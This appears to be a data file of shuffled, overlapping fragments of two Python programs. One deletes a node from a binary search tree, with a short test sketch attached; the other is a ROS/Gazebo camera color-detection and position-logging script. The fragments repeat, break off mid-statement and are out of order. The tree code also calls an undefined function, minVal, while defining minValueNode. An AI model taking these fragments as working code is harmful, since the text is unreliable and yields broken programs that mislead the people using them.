\"\"\" current = root # loop down to find the", "the root's # key then it lies in left subtree elif key >", "the root or no child v = minVal(root.right) # When both nodes exists,", "the iorder successor or the next higher node as per the inorder traversal", "== None: tmp = root.left root = None return tmp # Convers cases", "return if key < root.data: root.left = deleteNode(root.left, key) # If the key", "left subtree elif key > root.data: root.right = deleteNode(root.right, key) # If the", "minValueNode(root): \"\"\" Returns the iorder successor or the next higher node as per", "= None return tmp # Convers cases when there is only one child", "exists, get the inorder successor root.data = v.data root.right = deleteNode(root.right, v.data) #", "the inorder successor root.data = v.data root.right = deleteNode(root.right, v.data) # Delete the", "None return tmp elif root.right == None: tmp = root.left root = None", "current = root # loop down to find the leftmost leaf while(current.left is", "key to be deleted is smaller than the root's # key then it", "find the leftmost leaf while(current.left is not None): current = current.left return current", "lies in right part else: # The key is same as root's key,", "as root's key, then this is the node to be deleted if root.left", "key, then this is the node to be deleted if root.left == None:", "it lies in left subtree elif key > root.data: root.right = deleteNode(root.right, key)", "get the inorder successor root.data = v.data root.right = deleteNode(root.right, v.data) # Delete", "Returns the iorder successor or the next higher node as per the inorder", "<filename>functional-problems/deleteNodeFromBst.py #!/usr/bin/python3 # https://practice.geeksforgeeks.org/problems/delete-a-node-from-bst/1 def minValueNode(root): \"\"\" Returns the iorder successor or the", "root.right root = None return tmp elif root.right == None: tmp = root.left", "None: tmp = root.left root = None return tmp # Convers cases when", "right part else: # The key 
is same as root's key, then this", "or no child v = minVal(root.right) # When both nodes exists, get the", "no child v = minVal(root.right) # When both nodes exists, get the inorder", "# https://practice.geeksforgeeks.org/problems/delete-a-node-from-bst/1 def minValueNode(root): \"\"\" Returns the iorder successor or the next higher", "root # loop down to find the leftmost leaf while(current.left is not None):", "not None): current = current.left return current def deleteNode(root, key): if root ==", "only one child of the root or no child v = minVal(root.right) #", "key to be deleted is greater than the root's # key then it", "None): current = current.left return current def deleteNode(root, key): if root == None:", "if key < root.data: root.left = deleteNode(root.left, key) # If the key to", "one child of the root or no child v = minVal(root.right) # When", "of the root or no child v = minVal(root.right) # When both nodes", "minVal(root.right) # When both nodes exists, get the inorder successor root.data = v.data", "key then it lies in left subtree elif key > root.data: root.right =", "or the next higher node as per the inorder traversal \"\"\" current =", "= root.left root = None return tmp # Convers cases when there is", "the leftmost leaf while(current.left is not None): current = current.left return current def", "the root's # key then it lies in right part else: # The", "subtree elif key > root.data: root.right = deleteNode(root.right, key) # If the key", "next higher node as per the inorder traversal \"\"\" current = root #", "return current def deleteNode(root, key): if root == None: return if key <", "root.right = deleteNode(root.right, key) # If the key to be deleted is greater", "tmp = root.left root = None return tmp # Convers cases when there", "per the inorder traversal \"\"\" current = root # loop down to find", "key > root.data: root.right = deleteNode(root.right, key) # If the key to be", "this is the node to be deleted if root.left == None: tmp =", "than the root's # key then it lies in right part else: #", "successor root.data = v.data root.right = deleteNode(root.right, v.data) # Delete the inorder successor", "None return tmp # Convers cases when there is only one child of", "key) # If the key to be deleted is smaller than the root's", "# key then it lies in left subtree elif key > root.data: root.right", "None: return if key < root.data: root.left = deleteNode(root.left, key) # If the", "key is same as root's key, then this is the node to be", "deleted is greater than the root's # key then it lies in right", "leaf while(current.left is not None): current = current.left return current def deleteNode(root, key):", "root's # key then it lies in left subtree elif key > root.data:", "root.data = v.data root.right = deleteNode(root.right, v.data) # Delete the inorder successor return", "root.left == None: tmp = root.right root = None return tmp elif root.right", "root's # key then it lies in right part else: # The key", "elif root.right == None: tmp = root.left root = None return tmp #", "than the root's # key then it lies in left subtree elif key", "root or no child v = minVal(root.right) # When both nodes exists, get", "> root.data: root.right = deleteNode(root.right, key) # If the key to be deleted", "traversal \"\"\" current = root # loop down to find the leftmost leaf", "return tmp # Convers cases when there is only one child of the", "# When both nodes exists, get the inorder successor root.data = v.data root.right", "else: # The key is same as root's key, then this 
is the", "root.data: root.left = deleteNode(root.left, key) # If the key to be deleted is", "= None return tmp elif root.right == None: tmp = root.left root =", "is smaller than the root's # key then it lies in left subtree", "inorder traversal \"\"\" current = root # loop down to find the leftmost", "then this is the node to be deleted if root.left == None: tmp", "The key is same as root's key, then this is the node to", "node as per the inorder traversal \"\"\" current = root # loop down", "key): if root == None: return if key < root.data: root.left = deleteNode(root.left,", "https://practice.geeksforgeeks.org/problems/delete-a-node-from-bst/1 def minValueNode(root): \"\"\" Returns the iorder successor or the next higher node", "tmp # Convers cases when there is only one child of the root", "to be deleted is greater than the root's # key then it lies", "# If the key to be deleted is smaller than the root's #", "is not None): current = current.left return current def deleteNode(root, key): if root", "# If the key to be deleted is greater than the root's #", "is same as root's key, then this is the node to be deleted", "Convers cases when there is only one child of the root or no", "root = None return tmp # Convers cases when there is only one", "If the key to be deleted is greater than the root's # key", "is the node to be deleted if root.left == None: tmp = root.right", "then it lies in left subtree elif key > root.data: root.right = deleteNode(root.right,", "is only one child of the root or no child v = minVal(root.right)", "key) # If the key to be deleted is greater than the root's", "When both nodes exists, get the inorder successor root.data = v.data root.right =", "the node to be deleted if root.left == None: tmp = root.right root", "down to find the leftmost leaf while(current.left is not None): current = current.left", "the key to be deleted is greater than the root's # key then", "current def deleteNode(root, key): if root == None: return if key < root.data:", "current.left return current def deleteNode(root, key): if root == None: return if key", "v = minVal(root.right) # When both nodes exists, get the inorder successor root.data", "return tmp elif root.right == None: tmp = root.left root = None return", "greater than the root's # key then it lies in right part else:", "= v.data root.right = deleteNode(root.right, v.data) # Delete the inorder successor return root", "== None: return if key < root.data: root.left = deleteNode(root.left, key) # If", "same as root's key, then this is the node to be deleted if", "deleteNode(root, key): if root == None: return if key < root.data: root.left =", "tmp elif root.right == None: tmp = root.left root = None return tmp", "iorder successor or the next higher node as per the inorder traversal \"\"\"", "there is only one child of the root or no child v =", "the next higher node as per the inorder traversal \"\"\" current = root" ]
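

# A minimal local test sketch for deleteNode(). The Node class below is an
# assumption for standalone runs; on the GeeksforGeeks judge the tree node
# type is supplied by the platform.
class Node:
    def __init__(self, data):
        self.data = data
        self.left = None
        self.right = None


def inorder(root):
    # Inorder traversal of a BST yields its keys in sorted order
    return inorder(root.left) + [root.data] + inorder(root.right) if root else []


if __name__ == "__main__":
    root = Node(5)
    root.left, root.right = Node(3), Node(8)
    root.left.left, root.left.right = Node(2), Node(4)
    root = deleteNode(root, 3)   # 3 has two children: replaced by successor 4
    print(inorder(root))         # [2, 4, 5, 8]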
[]
[ "from gazebo_msgs.msg import ModelState from geometry_msgs.msg import Pose from geometry_msgs.msg import Point from", "* z out_x = -math.sin(yaw) * x_ - math.cos(yaw) * y_ out_y =", "vision.camera import Camera from color_detection import ColorDetection import cv2 as cv import rospy", "rospy.loginfo(\"Wait for camera capture..\") frame = cap.capture() while frame is None and not", "t = time.time() while not rospy.is_shutdown(): frame = cap.capture() t_cap = rospy.Time.now() mask", "# cv.putText(mask, \"fps: %.1f\" % fps, (240, 230), cv.FONT_HERSHEY_SIMPLEX, 0.5, 127, 2) cv.imshow(\"Frame\",", "\"__main__\": try: rospy.init_node(\"color_detection\") rate = rospy.Rate(15) # 15 FPS cam_pos_pub = rospy.Publisher('/datalog/cam', Point,", "import SetModelState from gazebo_msgs.msg import ModelState from geometry_msgs.msg import Pose from geometry_msgs.msg import", "pose.position.x, pose.position.y]) real_writer.writerow([waktu, pose.position.x, pose.position.y]) pose.position.x = pose.position.x + 0.001 pose.position.y = pose.position.y", "math.pi # CSV cam_csv = open('/home/musyafa/Datalog/cam.csv', 'w') real_csv = open('/home/musyafa/Datalog/real.csv', 'w') cam_writer =", "== 27: break fps = 0.9 * fps + 0.1 * 1 /", "= 62.2 FOVY = 48.8 KX = FOVX / FW / 180.0 *", "global pose, z, roll, pitch, yaw, waktu pose = msg.pose[1] z = msg.pose[1].position.z", "z, roll, pitch, yaw x_ = math.tan(KX * x - roll) * z", "# y_ = math.tan(KY * y + pitch - 1.57079632679) * z out_x", "/ (time.time() - t) t = time.time() rate.sleep() except rospy.ROSInterruptException: pass if cap", "Pose from geometry_msgs.msg import Point from geometry_msgs.msg import Quaternion from tf.transformations import euler_from_quaternion,", "z # y_ = math.tan(KY * y + pitch - 1.57079632679) * z", "* x_ - math.sin(yaw) * y_ return (out_x, out_y) if __name__ == \"__main__\":", "z # x_ = math.tan(KX * x + roll) * z # y_", "= rospy.Publisher(\"camera/data\", PointStamped, queue_size=10) rospy.Subscriber('/gazebo/model_states', ModelStates, models_cb) set_state = rospy.ServiceProxy('/gazebo/set_model_state', SetModelState) rospy.wait_for_message('/gazebo/model_states', ModelState)", "time import math from geometry_msgs.msg import PointStamped from gazebo_msgs.msg import ModelStates from gazebo_msgs.srv", "Point from geometry_msgs.msg import Quaternion from tf.transformations import euler_from_quaternion, quaternion_from_euler import csv lower_threshold", "= (180, 230, 255) FW = 320 FH = 240 FOVX = 62.2", "rospy.ServiceProxy('/gazebo/set_model_state', SetModelState) rospy.wait_for_message('/gazebo/model_states', ModelState) model = ModelState() model.model_name='pi_cam' model.pose = pose model.pose.position.x =", "30.0 t = time.time() while not rospy.is_shutdown(): frame = cap.capture() t_cap = rospy.Time.now()", "= 0 def models_cb(msg): global pose, z, roll, pitch, yaw, waktu pose =", "waktu, pose.position.x, pose.position.y]) real_writer.writerow([waktu, pose.position.x, pose.position.y]) pose.position.x = pose.position.x + 0.001 pose.position.y =", "* math.pi # CSV cam_csv = open('/home/musyafa/Datalog/cam.csv', 'w') real_csv = open('/home/musyafa/Datalog/real.csv', 'w') cam_writer", "cv.FONT_HERSHEY_SIMPLEX, 0.5, 127, 2) cv.imshow(\"Frame\", frame) # cv.imshow(\"Frame\", mask) key = cv.waitKey(15) if", "# cv.imshow(\"Frame\", mask) key = cv.waitKey(15) if key == 27: break fps =", "1.57079632679) * z out_x = -math.sin(yaw) * x_ - math.cos(yaw) * y_ out_y", "pose = Pose() z = 0 roll = 0 pitch = 0 yaw", "= PointStamped() centroid.point.x = 
cX - 160 centroid.point.y = cY - 120 centroid.point.y", "y + pitch - 1.57079632679) * z out_x = -math.sin(yaw) * x_ -", "ModelStates, models_cb) set_state = rospy.ServiceProxy('/gazebo/set_model_state', SetModelState) rospy.wait_for_message('/gazebo/model_states', ModelState) model = ModelState() model.model_name='pi_cam' model.pose", "roll) * z # y_ = math.tan(KY * y + pitch - 1.57079632679)", "cd.update(frame) if cd.centroid: (cX, cY) = cd.centroid centroid = PointStamped() centroid.point.x = cX", "t_cap cam_pub.publish(centroid) (X, Y) = trans_data(centroid.point.x, centroid.point.y) rospy.loginfo(\"ERRX: %f; ERRY: %f\", X -", "yaw, waktu pose = msg.pose[1] z = msg.pose[1].position.z orientation_list = [msg.pose[1].orientation.x, msg.pose[1].orientation.y, msg.pose[1].orientation.z,", "model.pose = pose set_state(model_state=model) real_pos_pub.publish(pose.position) if pose.position.x >= 0.5: break if cd.has_centroid: cv.circle(frame,", "yaw = 0 def models_cb(msg): global pose, z, roll, pitch, yaw, waktu pose", "rospy.Subscriber('/gazebo/model_states', ModelStates, models_cb) set_state = rospy.ServiceProxy('/gazebo/set_model_state', SetModelState) rospy.wait_for_message('/gazebo/model_states', ModelState) model = ModelState() model.model_name='pi_cam'", "cam_pos = Point(x=X, y=Y, z=1) cam_pos_pub.publish(cam_pos) cam_writer.writerow([t_cap, cam_pos.x, cam_pos.y, waktu, pose.position.x, pose.position.y]) real_writer.writerow([waktu,", "key = cv.waitKey(15) if key == 27: break fps = 0.9 * fps", "Y', 'Time', 'Real Position X', 'Real Position Y']) real_writer.writerow(['Time', 'Real Position X', 'Real", "models_cb) set_state = rospy.ServiceProxy('/gazebo/set_model_state', SetModelState) rospy.wait_for_message('/gazebo/model_states', ModelState) model = ModelState() model.model_name='pi_cam' model.pose =", "15 FPS cam_pos_pub = rospy.Publisher('/datalog/cam', Point, queue_size=5) real_pos_pub = rospy.Publisher('/datalog/real', Point, queue_size=5) cam_pub", "#!/usr/bin/env python3 import ta_vision from vision.camera import Camera from color_detection import ColorDetection import", "= open('/home/musyafa/Datalog/real.csv', 'w') cam_writer = csv.writer(cam_csv) real_writer = csv.writer(real_csv) cam_writer.writerow(['Time', 'Cam Position X',", "'Real Position X', 'Real Position Y']) real_writer.writerow(['Time', 'Real Position X', 'Real Position Y'])", "msg.pose[1] z = msg.pose[1].position.z orientation_list = [msg.pose[1].orientation.x, msg.pose[1].orientation.y, msg.pose[1].orientation.z, msg.pose[1].orientation.w] (roll, pitch, yaw)", "model.pose.position.x = -0.5 model.pose.position.y = -0.5 set_state(model_state=model) cap = Camera(port=5600) cd = ColorDetection(lower_threshold,", "centroid.point.y) rospy.loginfo(\"ERRX: %f; ERRY: %f\", X - pose.position.x, Y - pose.position.y) cam_pos =", "0.5, 127, 2) # if cd.has_centroid: # cv.circle(mask, cd.centroid, 5, 127, -1) #", "import Quaternion from tf.transformations import euler_from_quaternion, quaternion_from_euler import csv lower_threshold = (160, 190,", "csv.writer(cam_csv) real_writer = csv.writer(real_csv) cam_writer.writerow(['Time', 'Cam Position X', 'Cam Position Y', 'Time', 'Real", "None and not rospy.is_shutdown(): rate.sleep() frame = cap.capture() rospy.loginfo(\"Frame captured!\") fps = 30.0", "import euler_from_quaternion, quaternion_from_euler import csv lower_threshold = (160, 190, 220) upper_threshold = (180,", "pose = msg.pose[1] z = msg.pose[1].position.z orientation_list = [msg.pose[1].orientation.x, 
msg.pose[1].orientation.y, msg.pose[1].orientation.z, msg.pose[1].orientation.w] (roll,", "(240, 230), cv.FONT_HERSHEY_SIMPLEX, 0.5, 127, 2) # if cd.has_centroid: # cv.circle(mask, cd.centroid, 5,", "rospy.Publisher(\"camera/data\", PointStamped, queue_size=10) rospy.Subscriber('/gazebo/model_states', ModelStates, models_cb) set_state = rospy.ServiceProxy('/gazebo/set_model_state', SetModelState) rospy.wait_for_message('/gazebo/model_states', ModelState) model", "ta_vision from vision.camera import Camera from color_detection import ColorDetection import cv2 as cv", "upper_threshold = (180, 230, 255) FW = 320 FH = 240 FOVX =", "y_ = math.tan(KY * y + pitch - 1.57079632679) * z out_x =", "FOVY = 48.8 KX = FOVX / FW / 180.0 * math.pi KY", "# cv.circle(mask, cd.centroid, 5, 127, -1) # cv.putText(mask, \"fps: %.1f\" % fps, (240,", "127, -1) # cv.putText(mask, \"fps: %.1f\" % fps, (240, 230), cv.FONT_HERSHEY_SIMPLEX, 0.5, 127,", "from color_detection import ColorDetection import cv2 as cv import rospy import time import", "ColorDetection import cv2 as cv import rospy import time import math from geometry_msgs.msg", "if pose.position.x >= 0.5: break if cd.has_centroid: cv.circle(frame, cd.centroid, 5, 127, -1) cv.putText(frame,", "quaternion_from_euler import csv lower_threshold = (160, 190, 220) upper_threshold = (180, 230, 255)", "= cap.capture() while frame is None and not rospy.is_shutdown(): rate.sleep() frame = cap.capture()", "pose.position.x, Y - pose.position.y) cam_pos = Point(x=X, y=Y, z=1) cam_pos_pub.publish(cam_pos) cam_writer.writerow([t_cap, cam_pos.x, cam_pos.y,", "cap.capture() rospy.loginfo(\"Frame captured!\") fps = 30.0 t = time.time() while not rospy.is_shutdown(): frame", "orientation_list = [msg.pose[1].orientation.x, msg.pose[1].orientation.y, msg.pose[1].orientation.z, msg.pose[1].orientation.w] (roll, pitch, yaw) = euler_from_quaternion(orientation_list) waktu =", "= [msg.pose[1].orientation.x, msg.pose[1].orientation.y, msg.pose[1].orientation.z, msg.pose[1].orientation.w] (roll, pitch, yaw) = euler_from_quaternion(orientation_list) waktu = rospy.Time.now()", "z y_ = math.tan(KY * y - pitch) * z # x_ =", "open('/home/musyafa/Datalog/cam.csv', 'w') real_csv = open('/home/musyafa/Datalog/real.csv', 'w') cam_writer = csv.writer(cam_csv) real_writer = csv.writer(real_csv) cam_writer.writerow(['Time',", "+ 0.001 model.pose = pose set_state(model_state=model) real_pos_pub.publish(pose.position) if pose.position.x >= 0.5: break if", "= cap.capture() rospy.loginfo(\"Frame captured!\") fps = 30.0 t = time.time() while not rospy.is_shutdown():", "import rospy import time import math from geometry_msgs.msg import PointStamped from gazebo_msgs.msg import", "* y_ return (out_x, out_y) if __name__ == \"__main__\": try: rospy.init_node(\"color_detection\") rate =", "cv2 as cv import rospy import time import math from geometry_msgs.msg import PointStamped", "frame = cap.capture() while frame is None and not rospy.is_shutdown(): rate.sleep() frame =", "= cY - 120 centroid.point.y = -centroid.point.y centroid.header.stamp = t_cap cam_pub.publish(centroid) (X, Y)", "pose.position.x = pose.position.x + 0.001 pose.position.y = pose.position.y + 0.001 model.pose = pose", "/ 180.0 * math.pi # CSV cam_csv = open('/home/musyafa/Datalog/cam.csv', 'w') real_csv = open('/home/musyafa/Datalog/real.csv',", "- math.sin(yaw) * y_ return (out_x, out_y) if __name__ == \"__main__\": try: rospy.init_node(\"color_detection\")", "z = 0 roll = 0 pitch = 0 yaw = 0 def", "* 1 / (time.time() - t) t = 
time.time() rate.sleep() except rospy.ROSInterruptException: pass", "[msg.pose[1].orientation.x, msg.pose[1].orientation.y, msg.pose[1].orientation.z, msg.pose[1].orientation.w] (roll, pitch, yaw) = euler_from_quaternion(orientation_list) waktu = rospy.Time.now() def", "geometry_msgs.msg import Point from geometry_msgs.msg import Quaternion from tf.transformations import euler_from_quaternion, quaternion_from_euler import", "waktu pose = msg.pose[1] z = msg.pose[1].position.z orientation_list = [msg.pose[1].orientation.x, msg.pose[1].orientation.y, msg.pose[1].orientation.z, msg.pose[1].orientation.w]", "gazebo_msgs.msg import ModelState from geometry_msgs.msg import Pose from geometry_msgs.msg import Point from geometry_msgs.msg", "gazebo_msgs.srv import SetModelState from gazebo_msgs.msg import ModelState from geometry_msgs.msg import Pose from geometry_msgs.msg", "y=Y, z=1) cam_pos_pub.publish(cam_pos) cam_writer.writerow([t_cap, cam_pos.x, cam_pos.y, waktu, pose.position.x, pose.position.y]) real_writer.writerow([waktu, pose.position.x, pose.position.y]) pose.position.x", "Y - pose.position.y) cam_pos = Point(x=X, y=Y, z=1) cam_pos_pub.publish(cam_pos) cam_writer.writerow([t_cap, cam_pos.x, cam_pos.y, waktu,", "yaw) = euler_from_quaternion(orientation_list) waktu = rospy.Time.now() def trans_data(x, y): global z, roll, pitch,", "python3 import ta_vision from vision.camera import Camera from color_detection import ColorDetection import cv2", "cv.circle(frame, cd.centroid, 5, 127, -1) cv.putText(frame, \"fps: %.1f\" % fps, (240, 230), cv.FONT_HERSHEY_SIMPLEX,", "(time.time() - t) t = time.time() rate.sleep() except rospy.ROSInterruptException: pass if cap is", "- roll) * z y_ = math.tan(KY * y - pitch) * z", "import cv2 as cv import rospy import time import math from geometry_msgs.msg import", "= math.tan(KX * x + roll) * z # y_ = math.tan(KY *", "queue_size=5) real_pos_pub = rospy.Publisher('/datalog/real', Point, queue_size=5) cam_pub = rospy.Publisher(\"camera/data\", PointStamped, queue_size=10) rospy.Subscriber('/gazebo/model_states', ModelStates,", "Point, queue_size=5) real_pos_pub = rospy.Publisher('/datalog/real', Point, queue_size=5) cam_pub = rospy.Publisher(\"camera/data\", PointStamped, queue_size=10) rospy.Subscriber('/gazebo/model_states',", "geometry_msgs.msg import PointStamped from gazebo_msgs.msg import ModelStates from gazebo_msgs.srv import SetModelState from gazebo_msgs.msg", "if __name__ == \"__main__\": try: rospy.init_node(\"color_detection\") rate = rospy.Rate(15) # 15 FPS cam_pos_pub", "camera capture..\") frame = cap.capture() while frame is None and not rospy.is_shutdown(): rate.sleep()", "- t) t = time.time() rate.sleep() except rospy.ROSInterruptException: pass if cap is not", "euler_from_quaternion, quaternion_from_euler import csv lower_threshold = (160, 190, 220) upper_threshold = (180, 230,", "1 / (time.time() - t) t = time.time() rate.sleep() except rospy.ROSInterruptException: pass if", "'Cam Position Y', 'Time', 'Real Position X', 'Real Position Y']) real_writer.writerow(['Time', 'Real Position", "centroid.header.stamp = t_cap cam_pub.publish(centroid) (X, Y) = trans_data(centroid.point.x, centroid.point.y) rospy.loginfo(\"ERRX: %f; ERRY: %f\",", "pose.position.x + 0.001 pose.position.y = pose.position.y + 0.001 model.pose = pose set_state(model_state=model) real_pos_pub.publish(pose.position)", "(roll, pitch, yaw) = euler_from_quaternion(orientation_list) waktu = rospy.Time.now() def trans_data(x, y): global z,", "* y + pitch - 1.57079632679) * z 
out_x = -math.sin(yaw) * x_", "= 0 yaw = 0 def models_cb(msg): global pose, z, roll, pitch, yaw,", "pose.position.x >= 0.5: break if cd.has_centroid: cv.circle(frame, cd.centroid, 5, 127, -1) cv.putText(frame, \"fps:", "= msg.pose[1] z = msg.pose[1].position.z orientation_list = [msg.pose[1].orientation.x, msg.pose[1].orientation.y, msg.pose[1].orientation.z, msg.pose[1].orientation.w] (roll, pitch,", "captured!\") fps = 30.0 t = time.time() while not rospy.is_shutdown(): frame = cap.capture()", "2) # if cd.has_centroid: # cv.circle(mask, cd.centroid, 5, 127, -1) # cv.putText(mask, \"fps:", "cam_pos.x, cam_pos.y, waktu, pose.position.x, pose.position.y]) real_writer.writerow([waktu, pose.position.x, pose.position.y]) pose.position.x = pose.position.x + 0.001", "model.pose = pose model.pose.position.x = -0.5 model.pose.position.y = -0.5 set_state(model_state=model) cap = Camera(port=5600)", "Camera(port=5600) cd = ColorDetection(lower_threshold, upper_threshold) rospy.loginfo(\"Wait for camera capture..\") frame = cap.capture() while", "pose set_state(model_state=model) real_pos_pub.publish(pose.position) if pose.position.x >= 0.5: break if cd.has_centroid: cv.circle(frame, cd.centroid, 5,", "= pose.position.x + 0.001 pose.position.y = pose.position.y + 0.001 model.pose = pose set_state(model_state=model)", "= FOVX / FW / 180.0 * math.pi KY = FOVY / FH", "rospy import time import math from geometry_msgs.msg import PointStamped from gazebo_msgs.msg import ModelStates", "# 15 FPS cam_pos_pub = rospy.Publisher('/datalog/cam', Point, queue_size=5) real_pos_pub = rospy.Publisher('/datalog/real', Point, queue_size=5)", "PointStamped from gazebo_msgs.msg import ModelStates from gazebo_msgs.srv import SetModelState from gazebo_msgs.msg import ModelState", "ColorDetection(lower_threshold, upper_threshold) rospy.loginfo(\"Wait for camera capture..\") frame = cap.capture() while frame is None", "pitch, yaw) = euler_from_quaternion(orientation_list) waktu = rospy.Time.now() def trans_data(x, y): global z, roll,", "SetModelState) rospy.wait_for_message('/gazebo/model_states', ModelState) model = ModelState() model.model_name='pi_cam' model.pose = pose model.pose.position.x = -0.5", "real_writer = csv.writer(real_csv) cam_writer.writerow(['Time', 'Cam Position X', 'Cam Position Y', 'Time', 'Real Position", "PointStamped, queue_size=10) rospy.Subscriber('/gazebo/model_states', ModelStates, models_cb) set_state = rospy.ServiceProxy('/gazebo/set_model_state', SetModelState) rospy.wait_for_message('/gazebo/model_states', ModelState) model =", "5, 127, -1) # cv.putText(mask, \"fps: %.1f\" % fps, (240, 230), cv.FONT_HERSHEY_SIMPLEX, 0.5,", "180.0 * math.pi KY = FOVY / FH / 180.0 * math.pi #", "* y - pitch) * z # x_ = math.tan(KX * x +", "import Point from geometry_msgs.msg import Quaternion from tf.transformations import euler_from_quaternion, quaternion_from_euler import csv", "62.2 FOVY = 48.8 KX = FOVX / FW / 180.0 * math.pi", "(240, 230), cv.FONT_HERSHEY_SIMPLEX, 0.5, 127, 2) cv.imshow(\"Frame\", frame) # cv.imshow(\"Frame\", mask) key =", "= -math.sin(yaw) * x_ - math.cos(yaw) * y_ out_y = math.cos(yaw) * x_", "-0.5 set_state(model_state=model) cap = Camera(port=5600) cd = ColorDetection(lower_threshold, upper_threshold) rospy.loginfo(\"Wait for camera capture..\")", "= -0.5 model.pose.position.y = -0.5 set_state(model_state=model) cap = Camera(port=5600) cd = ColorDetection(lower_threshold, upper_threshold)", "%.1f\" % fps, (240, 230), cv.FONT_HERSHEY_SIMPLEX, 0.5, 127, 2) # if cd.has_centroid: #", "0 
def models_cb(msg): global pose, z, roll, pitch, yaw, waktu pose = msg.pose[1]", "Point(x=X, y=Y, z=1) cam_pos_pub.publish(cam_pos) cam_writer.writerow([t_cap, cam_pos.x, cam_pos.y, waktu, pose.position.x, pose.position.y]) real_writer.writerow([waktu, pose.position.x, pose.position.y])", "0.5, 127, 2) cv.imshow(\"Frame\", frame) # cv.imshow(\"Frame\", mask) key = cv.waitKey(15) if key", "\"fps: %.1f\" % fps, (240, 230), cv.FONT_HERSHEY_SIMPLEX, 0.5, 127, 2) # if cd.has_centroid:", "= cv.waitKey(15) if key == 27: break fps = 0.9 * fps +", "cd.centroid centroid = PointStamped() centroid.point.x = cX - 160 centroid.point.y = cY -", "0.001 model.pose = pose set_state(model_state=model) real_pos_pub.publish(pose.position) if pose.position.x >= 0.5: break if cd.has_centroid:", "127, -1) cv.putText(frame, \"fps: %.1f\" % fps, (240, 230), cv.FONT_HERSHEY_SIMPLEX, 0.5, 127, 2)", "rate.sleep() except rospy.ROSInterruptException: pass if cap is not None: cap.close() cv.destroyAllWindows() cam_csv.close() real_csv.close()", "pose.position.y = pose.position.y + 0.001 model.pose = pose set_state(model_state=model) real_pos_pub.publish(pose.position) if pose.position.x >=", "0 pitch = 0 yaw = 0 def models_cb(msg): global pose, z, roll,", "out_y = math.cos(yaw) * x_ - math.sin(yaw) * y_ return (out_x, out_y) if", "= rospy.Publisher('/datalog/cam', Point, queue_size=5) real_pos_pub = rospy.Publisher('/datalog/real', Point, queue_size=5) cam_pub = rospy.Publisher(\"camera/data\", PointStamped,", "geometry_msgs.msg import Quaternion from tf.transformations import euler_from_quaternion, quaternion_from_euler import csv lower_threshold = (160,", "frame is None and not rospy.is_shutdown(): rate.sleep() frame = cap.capture() rospy.loginfo(\"Frame captured!\") fps", "cd = ColorDetection(lower_threshold, upper_threshold) rospy.loginfo(\"Wait for camera capture..\") frame = cap.capture() while frame", "Y) = trans_data(centroid.point.x, centroid.point.y) rospy.loginfo(\"ERRX: %f; ERRY: %f\", X - pose.position.x, Y -", "'Cam Position X', 'Cam Position Y', 'Time', 'Real Position X', 'Real Position Y'])", "if cd.has_centroid: # cv.circle(mask, cd.centroid, 5, 127, -1) # cv.putText(mask, \"fps: %.1f\" %", "* fps + 0.1 * 1 / (time.time() - t) t = time.time()", "from geometry_msgs.msg import Quaternion from tf.transformations import euler_from_quaternion, quaternion_from_euler import csv lower_threshold =", "= pose set_state(model_state=model) real_pos_pub.publish(pose.position) if pose.position.x >= 0.5: break if cd.has_centroid: cv.circle(frame, cd.centroid,", "if cd.centroid: (cX, cY) = cd.centroid centroid = PointStamped() centroid.point.x = cX -", "- 120 centroid.point.y = -centroid.point.y centroid.header.stamp = t_cap cam_pub.publish(centroid) (X, Y) = trans_data(centroid.point.x,", "key == 27: break fps = 0.9 * fps + 0.1 * 1", "frame = cap.capture() t_cap = rospy.Time.now() mask = cd.update(frame) if cd.centroid: (cX, cY)", "x_ = math.tan(KX * x - roll) * z y_ = math.tan(KY *", "cap.capture() t_cap = rospy.Time.now() mask = cd.update(frame) if cd.centroid: (cX, cY) = cd.centroid", "- pose.position.x, Y - pose.position.y) cam_pos = Point(x=X, y=Y, z=1) cam_pos_pub.publish(cam_pos) cam_writer.writerow([t_cap, cam_pos.x,", "t) t = time.time() rate.sleep() except rospy.ROSInterruptException: pass if cap is not None:", "Position Y', 'Time', 'Real Position X', 'Real Position Y']) real_writer.writerow(['Time', 'Real Position X',", "= pose model.pose.position.x = -0.5 model.pose.position.y = -0.5 
set_state(model_state=model) cap = Camera(port=5600) cd", "while not rospy.is_shutdown(): frame = cap.capture() t_cap = rospy.Time.now() mask = cd.update(frame) if", "Quaternion from tf.transformations import euler_from_quaternion, quaternion_from_euler import csv lower_threshold = (160, 190, 220)", "waktu = rospy.Time(0) pose = Pose() z = 0 roll = 0 pitch", "%f\", X - pose.position.x, Y - pose.position.y) cam_pos = Point(x=X, y=Y, z=1) cam_pos_pub.publish(cam_pos)", "return (out_x, out_y) if __name__ == \"__main__\": try: rospy.init_node(\"color_detection\") rate = rospy.Rate(15) #", "not rospy.is_shutdown(): rate.sleep() frame = cap.capture() rospy.loginfo(\"Frame captured!\") fps = 30.0 t =", "import PointStamped from gazebo_msgs.msg import ModelStates from gazebo_msgs.srv import SetModelState from gazebo_msgs.msg import", "* z # x_ = math.tan(KX * x + roll) * z #", "set_state = rospy.ServiceProxy('/gazebo/set_model_state', SetModelState) rospy.wait_for_message('/gazebo/model_states', ModelState) model = ModelState() model.model_name='pi_cam' model.pose = pose", "cv.putText(frame, \"fps: %.1f\" % fps, (240, 230), cv.FONT_HERSHEY_SIMPLEX, 0.5, 127, 2) # if", "open('/home/musyafa/Datalog/real.csv', 'w') cam_writer = csv.writer(cam_csv) real_writer = csv.writer(real_csv) cam_writer.writerow(['Time', 'Cam Position X', 'Cam", "- 1.57079632679) * z out_x = -math.sin(yaw) * x_ - math.cos(yaw) * y_", "set_state(model_state=model) cap = Camera(port=5600) cd = ColorDetection(lower_threshold, upper_threshold) rospy.loginfo(\"Wait for camera capture..\") frame", "Camera from color_detection import ColorDetection import cv2 as cv import rospy import time", "ModelState() model.model_name='pi_cam' model.pose = pose model.pose.position.x = -0.5 model.pose.position.y = -0.5 set_state(model_state=model) cap", "- pitch) * z # x_ = math.tan(KX * x + roll) *", "trans_data(x, y): global z, roll, pitch, yaw x_ = math.tan(KX * x -", "cam_writer.writerow(['Time', 'Cam Position X', 'Cam Position Y', 'Time', 'Real Position X', 'Real Position", "import ModelStates from gazebo_msgs.srv import SetModelState from gazebo_msgs.msg import ModelState from geometry_msgs.msg import", "real_pos_pub = rospy.Publisher('/datalog/real', Point, queue_size=5) cam_pub = rospy.Publisher(\"camera/data\", PointStamped, queue_size=10) rospy.Subscriber('/gazebo/model_states', ModelStates, models_cb)", "cv.imshow(\"Frame\", frame) # cv.imshow(\"Frame\", mask) key = cv.waitKey(15) if key == 27: break", "cv.putText(mask, \"fps: %.1f\" % fps, (240, 230), cv.FONT_HERSHEY_SIMPLEX, 0.5, 127, 2) 